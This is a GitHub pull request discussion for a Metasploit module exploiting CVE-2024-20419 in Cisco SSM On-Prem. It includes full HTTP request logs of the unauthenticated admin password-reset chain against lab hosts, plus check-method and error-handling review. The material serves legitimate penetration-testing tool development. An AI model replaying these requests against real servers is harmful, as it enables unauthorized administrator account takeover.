-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module #19375
Conversation
Cisco SSM On-Prem Account Takeover (CVE-2024-20419)
Code cleanup and error handling added
Added error handling and made the code cleaner:
|
Added store_valid_credential
Code cleanup
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the PR, is it possible to add in a check
method?
Thank you for reviewing the PR! If I remember correctly, I didn't see an endpoint that returned version information for fingerprinting. Did you see one that I could add? |
code cleanup
|
Yes, I forgot to update the description from the original post. I've removed that part - the module should be good to go. :) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @h4x-x0r, thanks for the module! I attempted to download the vulnerable version from Cisco but it appears it's no longer available.
Would you be able to send the vulnerable .iso to msfdev@metasploit.com
? That would be greatly appreciated!
Once I get the vulnerable version installed I'd be happy to try and help write a check method, there might be a way to identify whether or not the target has been patched without obtaining version info. Thanks!
That's unfortunate; Getting the affected software from a vendor seems always to be the biggest issue.. Perhaps I could install a newer version which is patched, and see how the response differs when the relevant endpoints are queried, although it might not be too reliable across many different versions. Are you aware of some existing MSF modules that follow a similar approach for fingerprinting, in case the version information cannot be obtained directly from an unauthenticated context? On a related note - I have a couple modules that exploit vulnerabilities in hardware devices (router, switches, embedded servers, printers, etc.). I either had access to the hardware, or in some cases, I did user-mode emulation or full system emulation to get the targets running, but the process is usually quite involved or may rely on custom code that I created to get it working (i.e., you might not have access to the vulnerable product to run the module against). In such cases, is the module code, documentation and console output of a successful run still sufficient to get it merged when I submit a PR? |
Would you maybe be able to upload it to Google Drive and then email the link?
Yea! That's exactly what I was going to experiment with. Look for the differences in response codes/ response bodies between the patched and unpatched versions. Here's an example of a check method checking for the presence of the patch via HTTP response codes and header values instead of version info: metasploit-framework/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb Lines 79 to 94 in 25ee41d
Here's another example that's not HTTP related. metasploit-framework/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb Lines 129 to 146 in 609d356
In those cases we do always prefer if you can either send the software for us to test or in the case of qemu user emulation if you can write out the steps you took to setup the target. Like what was done here: metasploit-framework/documentation/modules/exploit/linux/http/qnap_qts_rce_cve_2023_47218.md Lines 16 to 116 in 6c252de
That way other users can test the module and if any future work needs to be done on the module we have a guide on how to setup a test target. If you write a module for a physical device and there's no way for us to verify the module works/ setup a test target on our end we can accept a |
@jheysel-r7 I've sent two emails (the day before yesterday and yesterday), just wanted to check if you got them. |
No problem, I've forwarded them to you directly. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @h4x-x0r, thanks for the great module. A couple minor comments. Testing was as expected 👍
Check Method
I'd first suggest refactoring the four requests that are sent in the run
method into their own methods because you'll need most of that functionality in the check
method.
We want to avoid sending all 4 requests twice, so we can create instance variables in the check
method like so:
@xsrf_token_value = get_xsrf_token_value
But because users have the ability to disable the check method it's not guaranteed they'll get set in the check method so we can use a conditional assignment operator in the run
method to set the instances variables if they're nil.
@xsrf_token_value ||= get_xsrf_token_value
A good example of this pattern can be found here:
metasploit-framework/modules/exploits/multi/http/apache_rocketmq_update_config.rb
Lines 125 to 129 in 429eaff
@version_request_response ||= send_version_request | |
@parsed_data ||= parse_rocketmq_data(@version_request_response) | |
@broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT']) | |
print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}") | |
execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port }) |
I've included output from a vulnerable and non-vulnerable target. It looks like if the check method gets the xsrf_token
and the auth_token
it should be able to send a request to /backend/reset_password
and a patched target will respond with:
{"error":"Invalid Access","error_message":"Invalid Access"}
where as a vulnerable target will respond with: {"status":"OK"}
.
It's a bit of an invasive check method as it's exploiting the vuln and reseting the password, they're might be better way.
Vulnerable Cisco SSM 8
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40
####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=luLnhy HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214846
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"9082ef92676a7e2e1348fd860dd9af23"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; path=/, _lic_engine_session=41457e8c3072e315668f818961607fd5; path=/; HttpOnly
X-Request-Id: 7d18818c-4899-4b5d-aedb-f87918ed62aa
X-Runtime: 0.009177
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"enabled":false,"redirect":"https://luLnhy:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 15
{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214884
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"290c8043abcda9226d13c9088b82c312"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; path=/
X-Request-Id: 89365b5d-d64d-4f74-bbdc-fd42d3f32e86
X-Runtime: 0.022502
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95"}
[+] Retrieved auth_token: 5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 189
{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215118
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"3d23d39a30bb7323f8ccfd64c52cf286"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; path=/
X-Request-Id: 9123f82b-762a-4a86-a3df-5cc14a1af28c
X-Runtime: 0.223049
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"status":"OK"}
####################
# Request:
####################
POST /backend/auth/identity/callback HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Accept: application/json
Content-Type: application/json
Content-Length: 52
{"username":"admin","password":"!1jUbfF9a2dxknM0P!"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215564
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"053537117e54842d118b2d083c3ca797"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=la%2Fc1B2m7jH%2Fb1SLfYR%2FJ1SIT9on4duQ4pcN8P4B70Do49Rfag6Up5Bn%2BbbVn%2FrUyADJZOs%2Fi6a0YsPbJys1KQ%3D%3D; path=/
X-Request-Id: 32f7e171-fd70-42d1-8949-6f41c0daf9dc
X-Runtime: 0.431364
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"provider":"identity","email":"","uid":"admin","first_name":"Local","last_name":"Admin","display_name":"Local Admin","organization":null,"country":"UNITED_STATES","language":"ENGLISH","description":null,"account_status":1,"role":"admin","individual_system_role":"admin","admin":"admin","id":1,"session_key":"68ac590bb05690cbb2ebacc9fcb1c15d5b19bb62ac39e8d33e3240ca25eb54bd","sso_user_id":null,"password_expires_in":null}
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
Patched Cisco SSM 9
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set rhost 172.16.199.201
rhost => 172.16.199.201
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.201
####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=mznLWl HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:54 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967234374
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"d38b0eae8cae5236d54cfce21dfdfc13"
Set-Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; path=/; secure, _lic_engine_session=0e84f758847748e8f185cbd782272edf; path=/; secure; HttpOnly
X-Request-Id: 23786a7e-db94-43ab-a8e0-5e2bd3f1fad6
X-Runtime: 0.056111
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"enabled":false,"redirect":"https://mznLWl:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 15
{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235145
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"313ec556206adb59fae3cf597925a1d7"
Set-Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; path=/; secure
X-Request-Id: fef68288-74e5-48a9-84f8-3b35aafeb03b
X-Runtime: 0.473530
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3"}
[+] Retrieved auth_token: 2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 189
{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235227
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"f66db6cb240b6ce9d3427f6b845d8716"
Set-Cookie: XSRF-TOKEN=PoHLG%2FkyL8Zgv2FMOVqVnkrcb8gcY0SixuCKUFAqTxITyHMvqnlFBj2TcIwqUYdSTNVnWTvytZAZHuv43KwHAA%3D%3D; path=/; secure
X-Request-Id: ff2f7cb4-555c-4ce0-a49e-92326972b401
X-Runtime: 0.051686
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"error":"Invalid Access","error_message":"Invalid Access"}
[-] Auxiliary aborted due to failure: unexpected-reply: Invalid Access
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) >
Testing
After I was able to log in into the application with the password in the NEW_PASSWORD datastore option.
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[+] Server reachable.
[+] Retrieved XSRF Token: foPj5oBEWs/Pbc5epBuLIW/22ionCaJv5R1c+IO7rpkFaWsERZZXEiG8FU+OmhM0meDWgS/Psc27Lx0LJorb6Q==
[+] Retrieved auth_token: 25ed4c1377c5e68b6740d010663f4a95ec2074c2ce37f0b7c904dc9093365ea2
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
Cleanup and check method added
@jheysel-r7 Thank you for your review and feedback, much appreciated. Also apologies for my late reply. I still need to review the check method based on your suggestions. The current draft sends the requests twice, but I'll update it later, using instance variables like you recommended. Your output of the vulnerable and patched version was helpful. I've also installed a patched version, and confirmed that it generally works:
|
Refactored code to remove duplicate requests
@jheysel-r7 I've updated the module to remove the duplicate requests. Thanks again for your feedback. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @h4x-x0r, thanks for making all of those changes. They look great.
One thing I forgot to mention. When the check method shares functionality with the run or exploit method like this you have to be careful to ensure that the check method is still always returning a CheckCode
.
If one of the method's the called by the check method executes a fail_with
the check method will not be able to return a CheckCode
. To work around this issue we can define some custom errors, have the methods raise these errors and then handle those errors accordingly in both the check and run methods.
I've pushed this change along with a few other minor fixes in f254eeb.
Testing
Error handling testing
I hardcoded some values to induce and test the error handling:
Check method handling:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server. "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: l2G/NLWAcqMg1nO1tRDyeUJI5Il/stIvc+ljsYi3Fj1mEkkk3j1PgHzCjnZVeECvOV91IT1nCEVnRzyvnUGWhA==
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: 2jUjI/jPLdS8S2ktrVV6hKFthpHGm3JPSAAt2k4fO/fVFFzUDgui42iFW/ilya2ICVAf6SuKe53Cj4j2ytklvg==
[+] Retrieved auth_token: 12090a926c5ceccfb850b76f0b2fa273d8c2e9e9aaa5d56ebf2c6095d5880ae4
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
Run method error handling:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: MZOn/v5A2HfHp6c5d0DlyXUVKWso+y0B1mEGvBrIzHVUe2vm3rhlzg6GxtHI02C5i+E7tRqXSq5gIC5VDcc37A==
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: HOti6Sne63dXErPIBkHwc5pEiXTMiQe/9UCNYvPUILOk0iesmWcuzunmf5tNM1nczCaNytGBvss9MdxvmFJupw==
[+] Retrieved auth_token: 60f4890d5bb36eab94c776b8f8e469506be1122a4e77ce4155f7dc214aa4f9d8
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password
[*] Auxiliary module execution completed
Testing was as expected on a vulnerable version:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: U4WTxHe4jHbgxH2TYLDyXqttSdPLET1MteWfS5nx7eTdbpmgue9rTTps1SVDawewbOk0ZWahrQXvB824sRDqCg==
[+] Retrieved auth_token: 806cc091a24b78f7bb9e19b4e28b641aecc6781aec101f4a0f16de9f6f3d2b06
[+] The target appears to be vulnerable.
[+] Password for the admin user was successfully updated: t9YKVWigDO2y1Tkc!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
AutoCheck set to false:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.50
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: 3SQKRCpHP9j2xSoY/471jNScqjeCsy24+mhlx5oXhmbzXGW5h/Ov3WEyVCwNVXO6iNgGUiiS9IcUNbrQTnOlWQ==
[+] Retrieved auth_token: 455cdc53c6a1336bba8a01049057ab420b2b6e3447093a7abd5b87de393bb9e7
[+] Password for the admin user was successfully updated: asdfasdfASDASDASD39!
[+] Login at: https://172.16.199.50:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
json = res.get_json_document | ||
raise ResetPasswordError, "There was an error resetting the password: #{json['error_message']}" if json['error_message'] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Before this check was added, if AutoCheck
was set to false and the NEW_PASSWORD
did not contain and upper case letter, the module would fail with a non-descriptive error message, because an error response has a response code of 200.
The module would continue, the response to backend/auth/identity/callback
would also be a 200 and the error message would be:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: N8bloAwZoPRD4kPc3Vl0XNOps4Yideqk0ro75xul5Sohz2M1xjTp08KNB0H5D2mpp6/sFtckmmP1LvPddCbMHg==
[+] Retrieved auth_token: b1d17afaac83730edac30dd2242eafc0adc0da4ef9b505ba5d0682c220f75b6b
[-] Auxiliary aborted due to failure: unexpected-reply: The requested user is not found.
[*] Auxiliary module execution completed
Now this error message is displayed like so:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.50
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: amUaFSgVZhNwx5qSUdX4Qv5ZVh4nPk8jsTv2etORqHP6oHbOYqRgt7UNQ1lYETgu2sZzw8Ja30Rqp12a9UbmjQ==
[+] Retrieved auth_token: 791252bb6a863cc21967d30c11b1a599efda1a100d45f6d8685145f52c8087ed
